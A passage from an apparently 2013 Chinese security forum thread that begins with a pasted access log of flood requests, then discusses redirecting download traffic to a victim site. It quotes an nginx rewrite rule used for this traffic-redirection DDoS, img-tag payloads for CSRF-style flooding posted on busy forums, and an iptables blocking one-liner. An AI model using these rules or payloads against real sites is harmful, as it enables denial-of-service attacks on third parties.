SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)" 219.150.151.4 - - [24/May/2013:22:08:23 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)" 14.117.194.204 - - [24/May/2013:22:08:23 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)" 183.156.53.206 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 113.89.97.65 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)" 14.153.144.182 - - [24/May/2013:22:08:24 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)" 113.89.97.65 - - [24/May/2013:22:08:25 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)" 180.157.86.134 - - [24/May/2013:22:08:25 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 113.89.97.65 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)" 61.171.115.42 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 118.213.174.214 - - [24/May/2013:22:08:26 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)" 113.89.97.65 - - [24/May/2013:22:08:29 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)" 58.19.214.162 - - [24/May/2013:22:08:29 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/4.0" 113.89.97.65 - - [24/May/2013:22:08:30 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)" 120.33.63.134 - - [24/May/2013:22:08:31 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 180.108.186.183 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; QQDownload 718; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)" 183.156.53.206 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 218.11.176.18 - - [24/May/2013:22:08:33 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 113.89.97.65 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)" 113.89.97.65 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2; MALCJS)" 58.209.237.174 - - [24/May/2013:22:08:34 +0800] "GET /?xl HTTP/1.1" 416 608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 58.212.102.13 - - [24/May/2013:22:08:35 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)" 58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)" 58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)" 218.31.5.235 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 200 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 718)" 58.212.102.13 - - [24/May/2013:22:08:36 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)" 58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)" 183.25.17.231 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 183.156.53.206 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 222.75.204.224 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 608 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)" 58.212.102.13 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 206 1541 "http://test.wooyun.imlonghao.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)" 61.171.115.42 - - [24/May/2013:22:08:37 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 112.102.189.170 - - [24/May/2013:22:08:39 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0" 183.156.53.206 - - [24/May/2013:22:08:41 +0800] "GET /?xl HTTP/1.1" 416 206 "-" "Mozilla/5.0"
8#
imlonghao (imlonghao.com 友情链接) | 2013-05-24 22:10
此时规则如下。
location ~* \.(rmvb)$ { rewrite ^/ http://test.wooyun.imlonghao.com/?xl; }
9#
/fd (/proc) ?() | 2013-05-24 22:10
牛B
10#
xsser (十根阳具有长短!!) | 2013-05-24 22:14
我日... 这个量还挺大
11#
leaf | 2013-05-24 22:20
好思路!
12#
docall (陈公子是也。。。) | 2013-05-24 22:22
going down!贱心快找护舒宝赞助吧!
13#
斯文的鸡蛋 (有图有jb... 但有jb不一定有真相) | 2013-05-24 22:33
真特么淫荡
14#
L.N. (张飞+曹操) | 2013-05-24 22:52
真心淫荡
15#
Mujj (找个玩渗透网站的、教我玩渗透、我给他8位qq和情侣) | 2013-05-24 23:02
cat wooyun.org.log | grep '符合规则的' | awk '{print "iptables -I INPUT -p tcp --dport 80 -s ", $1, "-j DROP"}'| sort -n | uniq | sh
16#
x0ers (第一个知道牛奶能喝的人都对奶牛做了些什么?) | 2013-05-24 23:02
好思路啊.顶
17#
LittlePig (</html>) | 2013-05-25 00:13
可以扔猥琐流了…
18#
livers (如梦似幻) | 2013-05-25 11:41
@imlonghao 自伤800啊
19#
虚云 | 2013-05-25 12:09
你rewrite得起么,想杀死别人,前提是你自己血多。
@livers
中肯!
20#
虚云 | 2013-05-25 12:10
不过思路确实值得赞一下,如果在某些可以上传并发布地址的空间放一个热门大片,后果不堪设想。
21#
z7y (我是z7y,我为小胖子代言!!) | 2013-05-25 12:31
超赞.... 扔猥琐流去吧~ @xsser
22#
insight-labs (Root Yourself in Success) | 2013-05-25 12:42
@虚云 如果能在对方网站上找到一个耗资源或者流量的链接,比如一个大文件。rewrite过去成本很低
23#
imlonghao (imlonghao.com 友情链接) | 2013-05-25 13:00
@虚云 @livers
观察只是rewrite的话,对自己没怎么伤...
像@insight-labs 所说的那样,对面有一个很大的文件,完全可以rewrite过去。
要注意,发起的这个链接是会去下载的..
24#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-05-25 14:36
说到流量转发攻击,其实有更简单更高效的,直接去百度贴吧访问量大的帖子里:
<img src="http://zone.wooyun.org/search/核总" /> <img src="https://lcx.cc/bigfile.rar" />
详见:【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息,你懂的……
25#
萧然 (喜欢一切美的东西·) | 2013-05-25 14:41
@核攻击 哇 这也可以?以前拿这种刷移动的推广 搞了个第一名 奖了个手机
26#
imlonghao (imlonghao.com 友情链接) | 2013-05-25 14:48
@核攻击 要D8要是能占据首页的话。。。。
27#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-05-25 14:49
说起来云资源攻击,前些年有人曾伪装p2p热门资源发起巨型纯流量攻击……
28#
imlonghao (imlonghao.com 友情链接) | 2013-05-25 14:57
@核攻击 有地址看看么?
29#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-05-25 15:07
@imlonghao 利用P2P网络发动大规模、大流量DDOS攻击
30#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-05-25 15:18
@萧然 详见:【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息
31#
CHForce (带马师) | 2013-05-25 15:58
一楼比一楼给力,招数越来越犀利
32#
happytree ("如果我死了,请吃掉我吧") | 2013-05-25 16:02
雅蠛蝶~太口怕了
33#
廷廷 (想法最重要) | 2013-05-25 16:16
@核攻击 果断学习啦!!!
34#
小森森 | 2013-05-25 17:44
赞一个~~不过……你自己网站也会很卡诶~
35#
imlonghao (imlonghao.com 友情链接) | 2013-05-25 18:08
@小森森 http://imlonghao.com 现在仍有这种情况,但是你觉得卡么?
36#
Mujj (找个玩渗透网站的、教我玩渗透、我给他8位qq和情侣) | 2013-05-25 18:52
@imlonghao 重写消耗的是CPU资源,不过也消不了多少。
37#
whking | 2013-05-25 19:56
@imlonghao 前几天你网站挂了,我以为你不开了的呢。
38#
imlonghao (imlonghao.com 友情链接) | 2013-05-25 20:32
@whking -.-##
39#
GaRY | 2013-05-26 00:45
好帖子!绝对精华。目前对这个方面进行ddos的技术不是没人想过,但是都没有实例化阶段。楼主这个帖子算是头一个了AFAIK。
40#
xsser (十根阳具有长短!!) | 2013-05-26 11:32
@livers 对洞主自己来说,这个应该只需要耗费重写的,但是对于目标来说可能还要过数据库......
41#
小森森 | 2013-05-26 14:56
@imlonghao 不卡。。但是上不去啊……
42#
蟋蟀哥哥 (popok是孙子!![just for fun]) | 2013-05-26 15:51
精华帖子了
hang | 2013-05-26 20:34
想到这个了,vessial在poc2011上面的演讲PPT
Xunlei_Network_Internal_for_PoC2011.pdf
相关内容:
【CSRF】基于图片方式(<img)的 DDOS、CC、会话劫持以及刺探用户信息
留言评论(旧系统):